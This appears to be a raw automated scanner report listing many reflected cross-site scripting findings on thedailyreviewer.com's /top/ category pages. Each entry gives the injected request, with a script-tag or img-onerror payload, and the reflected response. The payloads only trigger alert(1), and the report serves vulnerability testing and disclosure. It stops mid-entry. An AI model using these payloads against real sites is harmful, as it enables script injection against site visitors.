Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=dfa413b08a321d5a2f632d71b2e3de34; expires=Wed, 12-Dec-2035 00:34:21 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76409
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a5b25"><script>alert(1)</script>fea7bd3e61 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/financea5b25"><script>alert(1)</script>fea7bd3e61 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:44 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=bb1564f301da1ddb0463dfb6183ae806; expires=Wed, 12-Dec-2035 00:32:44 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15282
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/financea5b25"><script>alert(1)</script>fea7bd3e61%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a5149<img%20src%3da%20onerror%3dalert(1)>f79d879f42e was submitted in the REST URL parameter 2. This input was echoed as a5149<img src=a onerror=alert(1)>f79d879f42e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/financea5149<img%20src%3da%20onerror%3dalert(1)>f79d879f42e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:07 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=93e5f8f90530592ebf9935829b307734; expires=Wed, 12-Dec-2035 00:33:08 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76265
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 5f9aa<img%20src%3da%20onerror%3dalert(1)>c4ac0b9ef03 was submitted in the REST URL parameter 2. This input was echoed as 5f9aa<img src=a onerror=alert(1)>c4ac0b9ef03 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/gadgets5f9aa<img%20src%3da%20onerror%3dalert(1)>c4ac0b9ef03 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=95c476058ce51140ec553fdf9f89433f; expires=Wed, 12-Dec-2035 00:33:40 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76265
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cdac"><script>alert(1)</script>fc7269cdcd4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/gadgets2cdac"><script>alert(1)</script>fc7269cdcd4 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:14 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=483b5ab3b54a7cfbd98bbe90724bb63f; expires=Wed, 12-Dec-2035 00:33:14 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15290
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/gadgets2cdac"><script>alert(1)</script>fc7269cdcd4%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1307"><script>alert(1)</script>13259a360a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/healthe1307"><script>alert(1)</script>13259a360a5 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:56 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=433c2a827789452acda873c37c76b305; expires=Wed, 12-Dec-2035 00:32:57 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/healthe1307"><script>alert(1)</script>13259a360a5%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28522<img%20src%3da%20onerror%3dalert(1)>d6fa561114 was submitted in the REST URL parameter 2. This input was echoed as 28522<img src=a onerror=alert(1)>d6fa561114 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/health28522<img%20src%3da%20onerror%3dalert(1)>d6fa561114 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:23 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=98ccb9772760bda629bec476a089dba7; expires=Wed, 12-Dec-2035 00:33:23 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76217
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e02d8<img%20src%3da%20onerror%3dalert(1)>5c58925a650 was submitted in the REST URL parameter 2. This input was echoed as e02d8<img src=a onerror=alert(1)>5c58925a650 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/moviese02d8<img%20src%3da%20onerror%3dalert(1)>5c58925a650 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:34:18 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=70aaedb4f6c512e28462839194d10d88; expires=Wed, 12-Dec-2035 00:34:18 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76241
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2854a"><script>alert(1)</script>0e5b3134057 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/movies2854a"><script>alert(1)</script>0e5b3134057 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:54 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=05fdb0272a163808f14fb77f4ca5f123; expires=Wed, 12-Dec-2035 00:33:55 GMT; path=/
Content-Length: 15277
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/movies2854a"><script>alert(1)</script>0e5b3134057%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cc4d8<img%20src%3da%20onerror%3dalert(1)>d2ae5387921 was submitted in the REST URL parameter 2. This input was echoed as cc4d8<img src=a onerror=alert(1)>d2ae5387921 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/musiccc4d8<img%20src%3da%20onerror%3dalert(1)>d2ae5387921 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:34:06 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=69b16b19f99a662a4816593ae7215272; expires=Wed, 12-Dec-2035 00:34:06 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76217
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1ae98"><script>alert(1)</script>626aaca745e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/music1ae98"><script>alert(1)</script>626aaca745e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:39 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=5c7d3c4b77f740d7bcab887da1ba0188; expires=Wed, 12-Dec-2035 00:33:39 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15264
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/music1ae98"><script>alert(1)</script>626aaca745e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4961a"><script>alert(1)</script>d19c97b7212 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/nba-basketball4961a"><script>alert(1)</script>d19c97b7212 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:26 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=26c99d3374b5193022c2d00160f78310; expires=Wed, 12-Dec-2035 00:33:27 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15381
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/nba-basketball4961a"><script>alert(1)</script>d19c97b7212%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e5db6<img%20src%3da%20onerror%3dalert(1)>42b3cd9e16e was submitted in the REST URL parameter 2. This input was echoed as e5db6<img src=a onerror=alert(1)>42b3cd9e16e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/nba-basketballe5db6<img%20src%3da%20onerror%3dalert(1)>42b3cd9e16e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:55 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=305d5c037235e3d7b26acc89f6406f19; expires=Wed, 12-Dec-2035 00:33:56 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76433
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top Nba Basketballe5db6<img Src=a Onerror=alert(1)>42b3cd9e16e Blogs </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e1238<img%20src%3da%20onerror%3dalert(1)>f62307ac77f was submitted in the REST URL parameter 2. This input was echoed as e1238<img src=a onerror=alert(1)>f62307ac77f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/nfl-footballe1238<img%20src%3da%20onerror%3dalert(1)>f62307ac77f HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:43 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=7ac98e03d6dea3a8119351f951938471; expires=Wed, 12-Dec-2035 00:33:44 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76385
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 77ada"><script>alert(1)</script>23cd133b9c6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/nfl-football77ada"><script>alert(1)</script>23cd133b9c6 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:15 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=c9fc09992ed626cd30e0aa1f1de89800; expires=Wed, 12-Dec-2035 00:33:19 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15355
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/nfl-football77ada"><script>alert(1)</script>23cd133b9c6%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8b9d"><script>alert(1)</script>a42d6d37c17 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/politicsa8b9d"><script>alert(1)</script>a42d6d37c17 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:34 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=0473a65f54747b8db9e7ae0461dd8187; expires=Wed, 12-Dec-2035 00:32:35 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15303
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/politicsa8b9d"><script>alert(1)</script>a42d6d37c17%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b9937<img%20src%3da%20onerror%3dalert(1)>aa7607671fc was submitted in the REST URL parameter 2. This input was echoed as b9937<img src=a onerror=alert(1)>aa7607671fc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/politicsb9937<img%20src%3da%20onerror%3dalert(1)>aa7607671fc HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:33:04 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=a652805a2cb13e206f2395c049b2b804; expires=Wed, 12-Dec-2035 00:33:04 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 76289
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 8a363<img%20src%3da%20onerror%3dalert(1)>f6bd06caa1e was submitted in the REST URL parameter 2. This input was echoed as 8a363<img src=a onerror=alert(1)>f6bd06caa1e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /top/real-estate8a363<img%20src%3da%20onerror%3dalert(1)>f6bd06caa1e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:53 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=d162d3d3921b234f118d826756f59278; expires=Wed, 12-Dec-2035 00:32:54 GMT; path=/
Content-Length: 76361
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <h1 class="headline">Top Real Estate8a363<img Src=a Onerror=alert(1)>f6bd06caa1e Blogs </h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f71fb"><script>alert(1)</script>10d32514335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/real-estatef71fb"><script>alert(1)</script>10d32514335 HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:29 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=1d24ec56f99518bd28c998f49f008da0; expires=Wed, 12-Dec-2035 00:32:30 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15342
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/real-estatef71fb"><script>alert(1)</script>10d32514335%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eda3f"><script>alert(1)</script>c887d936b5e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /top/regional-newseda3f"><script>alert(1)</script>c887d936b5e HTTP/1.1
Host: thedailyreviewer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Date: Sat, 11 Dec 2010 18:32:37 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_wsgi/3.3 Python/2.5
X-Powered-By: PHP/5.2.9
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: CAKEPHP=954225393b117835cb831355dab346ee; expires=Wed, 12-Dec-2035 00:32:39 GMT; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 15368
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <a class="share-button" href="http://twitter.com/home/?status=Checkin%27%20out%20http://thedailyreviewer.com/top/regional-newseda3f"><script>alert(1)</script>c887d936b5e%20by%20@dailyreviewer"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload eae31<img%20src%3da%20onerror%3dalert(1)>95cdeb24803 was submitted in the REST URL parameter 2. This input was echoed as eae31<img src=a onerror=alert(1)>95cdeb24803 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
